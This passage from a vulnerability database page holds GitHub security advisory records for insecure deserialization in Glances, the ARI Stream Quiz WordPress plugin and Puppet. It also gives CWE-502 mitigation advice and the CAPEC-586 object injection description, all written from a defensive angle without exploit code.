publicly until a fix has been released, or 90 days have elapsed from the date of this report, whichever comes first.\n\n---\n\n### Credits\n\nThis issue was identified by Micha\u0142 Majchrowicz and Marcin Wyczechowski, members of the AFINE Team.\n\n---",
"id": "GHSA-9837-48hr-q32j",
"modified": "2026-06-22T21:21:07Z",
"published": "2026-06-22T21:21:07Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-9837-48hr-q32j"
},
{
"type": "PACKAGE",
"url": "https://github.com/nicolargo/glances"
},
{
"type": "WEB",
"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Glances has Insecure Pickle Deserialization in its Version Cache that Leads to Arbitrary Code Execution"
}
GHSA-983R-78QH-9FRX
Vulnerability from github – Published: 2023-12-31 12:30 – Updated: 2026-04-28 21:33Deserialization of Untrusted Data vulnerability in ARI Soft ARI Stream Quiz – WordPress Quizzes Builder.This issue affects ARI Stream Quiz – WordPress Quizzes Builder: from n/a through 1.3.0.
{
"affected": [],
"aliases": [
"CVE-2023-52182"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-12-31T10:15:08Z",
"severity": "CRITICAL"
},
"details": "Deserialization of Untrusted Data vulnerability in ARI Soft ARI Stream Quiz \u2013 WordPress Quizzes Builder.This issue affects ARI Stream Quiz \u2013 WordPress Quizzes Builder: from n/a through 1.3.0.",
"id": "GHSA-983r-78qh-9frx",
"modified": "2026-04-28T21:33:40Z",
"published": "2023-12-31T12:30:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52182"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/vulnerability/ari-stream-quiz/wordpress-ari-stream-quiz-plugin-1-3-0-php-object-injection-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-988W-9QQW-43HR
Vulnerability from github – Published: 2022-05-14 03:21 – Updated: 2022-05-14 03:21Versions of Puppet prior to 4.10.1 will deserialize data off the wire (from the agent to the server, in this case) with a attacker-specified format. This could be used to force YAML deserialization in an unsafe manner, which would lead to remote code execution. This change constrains the format of data on the wire to PSON or safely decoded YAML.
{
"affected": [],
"aliases": [
"CVE-2017-2295"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-07-05T15:29:00Z",
"severity": "HIGH"
},
"details": "Versions of Puppet prior to 4.10.1 will deserialize data off the wire (from the agent to the server, in this case) with a attacker-specified format. This could be used to force YAML deserialization in an unsafe manner, which would lead to remote code execution. This change constrains the format of data on the wire to PSON or safely decoded YAML.",
"id": "GHSA-988w-9qqw-43hr",
"modified": "2022-05-14T03:21:36Z",
"published": "2022-05-14T03:21:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-2295"
},
{
"type": "WEB",
"url": "https://puppet.com/security/cve/cve-2017-2295"
},
{
"type": "WEB",
"url": "http://www.debian.org/security/2017/dsa-3862"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/98582"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N",
"type": "CVSS_V3"
}
]
}
Mitigation
If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified.
Mitigation
When deserializing data, populate a new object rather than just deserializing. The result is that the data flows through safe input validation and that the functions are safe.
Mitigation
Explicitly define a final object() to prevent deserialization.
Mitigation
- Make fields transient to protect them from deserialization.
- An attempt to serialize and then deserialize a class containing transient fields will result in NULLs where the transient data should be. This is an excellent way to prevent time, environment-based, or sensitive variables from being carried over and used improperly.
Mitigation
Avoid having unnecessary types or gadgets (a sequence of instances and method invocations that can self-execute during the deserialization process, often found in libraries) available that can be leveraged for malicious ends. This limits the potential for unintended or unauthorized types and gadgets to be leveraged by the attacker. Add only acceptable classes to an allowlist. Note: new gadgets are constantly being discovered, so this alone is not a sufficient mitigation.
Mitigation
Employ cryptography of the data or code for protection. However, it's important to note that it would still be client-side security. This is risky because if the client is compromised then the security implemented on the client (the cryptography) can be bypassed.
Mitigation MIT-29
Strategy: Firewall
Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481].
CAPEC-586: Object Injection
An adversary attempts to exploit an application by injecting additional, malicious content during its processing of serialized objects. Developers leverage serialization in order to convert data or state into a static, binary format for saving to disk or transferring over a network. These objects are then deserialized when needed to recover the data/state. By injecting a malformed object into a vulnerable application, an adversary can potentially compromise the application by manipulating the deserialization process. This can result in a number of unwanted outcomes, including remote code execution.